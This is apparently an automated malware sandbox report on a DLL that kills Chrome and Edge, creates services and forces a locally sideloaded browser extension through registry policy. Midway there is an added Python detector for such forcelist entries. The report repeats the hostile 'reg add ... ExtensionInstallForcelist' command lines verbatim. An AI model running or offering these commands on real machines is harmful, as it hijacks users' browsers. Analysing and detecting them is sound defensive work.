Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85E6138 39_2_000001C9C85E6138
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C853A228 39_2_000001C9C853A228
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C856A280 39_2_000001C9C856A280
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C8538294 39_2_000001C9C8538294
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85BE238 39_2_000001C9C85BE238
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C8594230 39_2_000001C9C8594230
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85E6308 39_2_000001C9C85E6308
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85E6328 39_2_000001C9C85E6328
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85E6320 39_2_000001C9C85E6320
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85D6318 39_2_000001C9C85D6318
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85E6310 39_2_000001C9C85E6310
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85E6340 39_2_000001C9C85E6340
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85E6338 39_2_000001C9C85E6338
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85E6330 39_2_000001C9C85E6330
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85E6360 39_2_000001C9C85E6360
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85E6358 39_2_000001C9C85E6358
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85563E0 39_2_000001C9C85563E0
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C8548460 39_2_000001C9C8548460
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85C2514 39_2_000001C9C85C2514
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85CC5A0 39_2_000001C9C85CC5A0
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85BA610 39_2_000001C9C85BA610
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85C4698 39_2_000001C9C85C4698
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C8586660 39_2_000001C9C8586660
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85C8728 39_2_000001C9C85C8728
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85C07F4 39_2_000001C9C85C07F4
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C856A7D0 39_2_000001C9C856A7D0
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C857FA75 39_2_000001C9C857FA75
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85D9A6C 39_2_000001C9C85D9A6C
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85CDADC 39_2_000001C9C85CDADC
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85AFB50 39_2_000001C9C85AFB50
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C8539C28 39_2_000001C9C8539C28
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C8567C98 39_2_000001C9C8567C98
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C8537C40 39_2_000001C9C8537C40
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C8569D70 39_2_000001C9C8569D70
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85D5D90 39_2_000001C9C85D5D90
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85A1D40 39_2_000001C9C85A1D40
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85BDDD8 39_2_000001C9C85BDDD8
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C856DE70 39_2_000001C9C856DE70
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C8597FA0 39_2_000001C9C8597FA0
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C853FF90 39_2_000001C9C853FF90
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C8569F30 39_2_000001C9C8569F30
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85C9F5C 39_2_000001C9C85C9F5C
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C8565F50 39_2_000001C9C8565F50
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85E6088 39_2_000001C9C85E6088
Source: C:\Windows\System32\rundll32.exe Code function: String function: 000001C9C85B4DBC appears 56 times
Source: C:\Windows\System32\rundll32.exe Code function: String function: 00000166D8F3F85C appears 39 times
Source: C:\Windows\System32\rundll32.exe Code function: String function: 000001C9C85802A0 appears 205 times
Source: C:\Windows\System32\rundll32.exe Code function: String function: 000001C9C856B0A0 appears 46 times
Source: C:\Windows\System32\rundll32.exe Code function: String function: 00000166D8F55AF8 appears 54 times
Source: C:\Windows\System32\rundll32.exe Code function: String function: 000001C9C8585B60 appears 51 times
Source: C:\Windows\System32\rundll32.exe Code function: String function: 000001C9C856DBB0 appears 51 times
Source: C:\Windows\System32\rundll32.exe Code function: String function: 000001C9C85B2F8C appears 61 times
Source: C:\Windows\System32\rundll32.exe Code function: String function: 000001C9C856DD30 appears 34 times
Source: C:\Windows\System32\rundll32.exe Code function: String function: 0000021BD978F85C appears 39 times
Source: C:\Windows\System32\rundll32.exe Code function: String function: 000001C9C8580130 appears 293 times
Source: C:\Windows\System32\rundll32.exe Code function: String function: 0000021BD97A5AF8 appears 54 times
Source: C:\Windows\System32\rundll32.exe Code function: String function: 000001C9C85B8760 appears 47 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 046B4DC0 appears 37 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 045F4DC0 appears 37 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 03464DC0 appears 37 times
Source: anuwhqTXGt.dll Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\reg.exe reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Edge\ExtensionInstallForcelist /v 1 /t REG_SZ /d liffkepbndfkkknedglekeghaegocokk;file:///C:/Windows/Installer/{f4b964cf-1b7a-aa88-03cb-3533f33b6987}/c23a32abd836342a70b7f6c1aa74947e.2.E /reg:32
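The reg.exe command line above is the mechanism behind the "Modifies Chrome's extension installation force list" signature: an ExtensionInstallForcelist entry has the form <extension id>;<update url>, and an update URL that is a file:/// path under C:\Windows\Installer makes the browser install that local CRX as a policy-forced extension the user cannot remove. The following check is an added example written for this page, not code from the sandbox or the sample; the Chrome and Edge store endpoints it treats as "official" are the documented store update URLs, and the benign comparison line is constructed.

```python
"""Classify ExtensionInstallForcelist entries written via `reg add`.

Added example (not part of the sandbox report). Flags entries whose update
URL is anything other than the browser's own store endpoint, in particular
file:/// sideloads like the one observed in this report.
"""
import re
from dataclasses import dataclass
from typing import Optional
from urllib.parse import urlsplit

# Documented store update endpoints; any other update URL is policy-forced sideloading.
OFFICIAL_UPDATE_URLS = {
    "chrome": "https://clients2.google.com/service/update2/crx",
    "edge": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",
}
EXT_ID_RE = re.compile(r"^[a-p]{32}$")   # CRX ids are 32 characters drawn from a..p


@dataclass
class Finding:
    browser: str
    extension_id: str
    update_url: Optional[str]
    suspicious: bool
    reason: str


def check_entry(browser: str, value: str) -> Finding:
    """Classify one forcelist entry of the form '<id>[;<update_url>]'."""
    ext_id, sep, url = value.partition(";")
    url = url.strip() if sep else None
    if not EXT_ID_RE.match(ext_id):
        return Finding(browser, ext_id, url, True, "malformed extension id")
    if url is None or url == OFFICIAL_UPDATE_URLS[browser]:
        return Finding(browser, ext_id, url, False, "store-backed install")
    scheme = urlsplit(url).scheme.lower()
    if scheme == "file":
        return Finding(browser, ext_id, url, True, "CRX sideloaded from a local file")
    if scheme != "https":
        return Finding(browser, ext_id, url, True, f"non-https update url ({scheme or 'none'})")
    return Finding(browser, ext_id, url, True, "update url is not the store endpoint")


def check_reg_add(cmdline: str) -> Optional[Finding]:
    """Parse an unquoted `reg add <key> ... /d <data>` command line (the form
    seen in the report) and classify it; returns None for unrelated commands."""
    tokens = cmdline.split()
    lowered = [t.lower() for t in tokens]
    if len(tokens) < 3 or lowered[0].rsplit("\\", 1)[-1] not in ("reg", "reg.exe") or lowered[1] != "add":
        return None
    key = lowered[2]
    if not key.endswith("\\extensioninstallforcelist"):
        return None
    if "\\microsoft\\edge\\" in key:
        browser = "edge"
    elif "\\google\\chrome\\" in key:
        browser = "chrome"
    else:
        return None
    try:
        data = tokens[lowered.index("/d") + 1]
    except (ValueError, IndexError):
        return None
    return check_entry(browser, data.strip('"'))


# Command line observed in this report (reg.exe spawned by rundll32.exe).
OBSERVED = ("reg add HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Edge\\ExtensionInstallForcelist "
            "/v 1 /t REG_SZ /d liffkepbndfkkknedglekeghaegocokk;file:///C:/Windows/Installer/"
            "{f4b964cf-1b7a-aa88-03cb-3533f33b6987}/c23a32abd836342a70b7f6c1aa74947e.2.E /reg:32")
# Constructed benign comparison: a store-backed Chrome forcelist entry.
BENIGN = ("reg add HKLM\\Software\\Policies\\Google\\Chrome\\ExtensionInstallForcelist "
          "/v 1 /t REG_SZ /d abcdefghijklmnopabcdefghijklmnop;https://clients2.google.com/service/update2/crx")

if __name__ == "__main__":
    for line in (OBSERVED, BENIGN):
        print(check_reg_add(line))
```

The same check_entry function can be run over the values read back from HKLM\Software\Policies\Microsoft\Edge\ExtensionInstallForcelist (and the Google\Chrome counterpart) on a live host; the parser only handles the unquoted /d data form shown in the report, so quote the data yourself if a value contains spaces.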
Source: classification engine Classification label: mal84.phis.evad.winDLL@83/48@7/4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046A1130 SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,lstrcpynW,lstrcpynW,GetCommandLineW,lstrcpynW,GetModuleHandleW,CharNextW,lstrcpynW,GetTempPathW,GetTempPathW,lstrcatW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcpynW,lstrcpynW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,lstrcpynW,lstrcpynW,DeleteFileW,CopyFileW,CloseHandle,lstrcatW,lstrlenW,lstrcmpiW,GetFileAttributesW,lstrcpynW,LoadImageW,RegisterClassW,SystemParametersInfoW,CreateWindowExW,CloseHandle,FreeLibrary,GlobalFree,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx, 6_2_046A1130
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_045E1130 SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,lstrcpynW,lstrcpynW,GetCommandLineW,lstrcpynW,GetModuleHandleW,CharNextW,lstrcpynW,GetTempPathW,GetTempPathW,lstrcatW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcpynW,lstrcpynW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,lstrcpynW,lstrcpynW,DeleteFileW,CopyFileW,CloseHandle,lstrcatW,lstrlenW,lstrcmpiW,GetFileAttributesW,lstrcpynW,LoadImageW,RegisterClassW,SystemParametersInfoW,CreateWindowExW,CloseHandle,FreeLibrary,GlobalFree,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx, 7_2_045E1130
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_03451130 SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,lstrcpynW,lstrcpynW,GetCommandLineW,lstrcpynW,GetModuleHandleW,CharNextW,lstrcpynW,GetTempPathW,GetTempPathW,lstrcatW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcpynW,lstrcpynW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,lstrcpynW,lstrcpynW,DeleteFileW,CopyFileW,CloseHandle,lstrcatW,lstrlenW,lstrcmpiW,GetFileAttributesW,lstrcpynW,LoadImageW,RegisterClassW,SystemParametersInfoW,CreateWindowExW,CloseHandle,FreeLibrary,GlobalFree,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx, 15_2_03451130
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD978B040 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle, 33_2_0000021BD978B040
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F3B040 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle, 34_2_00000166D8F3B040
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C8532F4C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,WTSEnumerateSessionsW,WTSFreeMemory,WTSQueryUserToken,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,DuplicateTokenEx,CloseHandle,CloseHandle,CreateEnvironmentBlock,CreateProcessAsUserW,CloseHandle,CloseHandle,DestroyEnvironmentBlock,DestroyEnvironmentBlock,CloseHandle,CloseHandle,CloseHandle, 39_2_000001C9C8532F4C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046A5887 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,lstrcpynW,lstrcpynW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,EnableWindow, 6_2_046A5887
Source: C:\Windows\System32\rundll32.exe Code function: PathFileExistsW,OpenSCManagerW,CreateServiceW,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 33_2_0000021BD9772DD0
Source: C:\Windows\System32\rundll32.exe Code function: PathFileExistsW,OpenSCManagerW,CreateServiceW,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 34_2_00000166D8F22DD0
Source: C:\Windows\System32\rundll32.exe Code function: PathFileExistsW,OpenSCManagerW,CreateServiceW,GetLastError,CloseServiceHandle,ChangeServiceConfig2W,CloseServiceHandle,CloseServiceHandle, 39_2_000001C9C85318D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046A4392 CoCreateInstance, 6_2_046A4392
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_6D4BB105 LoadResource,LockResource,SizeofResource, 6_2_6D4BB105
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD9773160 OpenSCManagerA,OpenServiceW,QueryServiceStatusEx,StartServiceA,CloseServiceHandle,CloseServiceHandle, 33_2_0000021BD9773160
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD978D9D0 StartServiceCtrlDispatcherW, 33_2_0000021BD978D9D0
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F3D9D0 StartServiceCtrlDispatcherW, 34_2_00000166D8F3D9D0
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C8551D48 GetCommandLineW,CommandLineToArgvW,OpenEventW,CloseHandle,StartServiceCtrlDispatcherW, 39_2_000001C9C8551D48
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Program Files (x86)\Wimsys
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\Public\wss_tmp
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7576:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7492:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7820:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7704:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6540:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7768:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7872:120:WilError_03
Source: C:\Windows\System32\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\A6A161D8-150E-46A1-B7EC-18E4CB58C6D2
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7632:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8052:120:WilError_03
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user~1\AppData\Local\Temp\nsvEFD9.tmp
Source: anuwhqTXGt.dll Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "msedge.exe")
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe")
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Users\desktop.ini
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\anuwhqTXGt.dll",#1
Source: taskkill.exe, 00000011.00000002.1386001358.0000000003268000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "msedge.exe")m ;;dZ
Source: anuwhqTXGt.dll Virustotal: Detection: 11%
Source: rundll32.exe String found in binary or memory: --install-run
Source: rundll32.exe String found in binary or memory: --install
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\anuwhqTXGt.dll"
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\anuwhqTXGt.dll",#1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\anuwhqTXGt.dll",#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\anuwhqTXGt.dll,get
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalService -s W32Time
Source: unknown Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\anuwhqTXGt.dll",get
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /IM msedge.exe
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /IM msedge.exe
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /IM chrome.exe
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /IM chrome.exe
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\reg.exe reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Edge\ExtensionInstallForcelist /v 1 /t REG_SZ /d liffkepbndfkkknedglekeghaegocokk;file:///C:/Windows/Installer/{f4b964cf-1b7a-aa88-03cb-3533f33b6987}/c23a32abd836342a70b7f6c1aa74947e.2.E /reg:32
Source: C:\Windows\SysWOW64\reg.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\reg.exe reg add HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\ExtensionInstallForcelist /v 1 /t REG_SZ /d liffkepbndfkkknedglekeghaegocokk;file:///C:/Windows/Installer/{f4b964cf-1b7a-aa88-03cb-3533f33b6987}/c23a32abd836342a70b7f6c1aa74947e.2 /reg:32
Source: C:\Windows\SysWOW64\reg.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /IM msedge.exe
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 "C:\Users\Public\wss_tmp\cr_ws_2.dll" main --install-run
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 "C:\Users\Public\wss_tmp\cr_ws_2.dll" main --install-run
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe rundll32 "C:\Users\Public\wss_tmp\cr_ws_2.dll" main --install-run
Source: unknown Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\Public\wss_tmp\cr_ws_2.dll" main
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /IM chrome.exe
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 "C:\Users\Public\fbe\fbegbhf.dll" main -c uninstall
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe rundll32 "C:\Users\Public\fbe\fbegbhf.dll" main -c uninstall
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\rundll32.exe "rundll32.exe" "C:\Users\Public\wss_tmp\cr_ws_2.dll" main JkoI28tA7 s54VVA9PL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 "C:\Users\Public\wss_tmp\cr_ws_2.dll" main --install-run
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe rundll32 "C:\Users\Public\wss_tmp\cr_ws_2.dll" main --install-run
Source: unknown Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\Public\wss_tmp\cr_ws_2.dll" main
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 "C:\Users\Public\fbe\fbegbhf.dll" main -c install-run
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe rundll32 "C:\Users\Public\fbe\fbegbhf.dll" main -c install-run
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 "C:\Users\Public\fbe\fbegbhf.dll" main -c uninstall
Source: unknown Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\Public\fbe\fbegbhf.dll" main
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe rundll32 "C:\Users\Public\fbe\fbegbhf.dll" main -c uninstall
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\rundll32.exe "rundll32.exe" "C:\Users\Public\wss_tmp\cr_ws_2.dll" main 5l2dLaWBz 8H16fjAVL
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\anuwhqTXGt.dll",#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\anuwhqTXGt.dll,get
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\anuwhqTXGt.dll",get
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\anuwhqTXGt.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /IM msedge.exe
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /IM chrome.exe
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\reg.exe reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Edge\ExtensionInstallForcelist /v 1 /t REG_SZ /d liffkepbndfkkknedglekeghaegocokk;file:///C:/Windows/Installer/{f4b964cf-1b7a-aa88-03cb-3533f33b6987}/c23a32abd836342a70b7f6c1aa74947e.2.E /reg:32
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\reg.exe reg add HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\ExtensionInstallForcelist /v 1 /t REG_SZ /d liffkepbndfkkknedglekeghaegocokk;file:///C:/Windows/Installer/{f4b964cf-1b7a-aa88-03cb-3533f33b6987}/c23a32abd836342a70b7f6c1aa74947e.2 /reg:32
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 "C:\Users\Public\wss_tmp\cr_ws_2.dll" main --install-run
Source: C:\Windows\SysWOW64\rundll32.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /IM msedge.exe
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /IM chrome.exe
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 "C:\Users\Public\wss_tmp\cr_ws_2.dll" main --install-run
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 "C:\Users\Public\fbe\fbegbhf.dll" main -c uninstall
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 "C:\Users\Public\fbe\fbegbhf.dll" main -c install-run
Source: C:\Windows\SysWOW64\rundll32.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /IM msedge.exe
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /IM chrome.exe
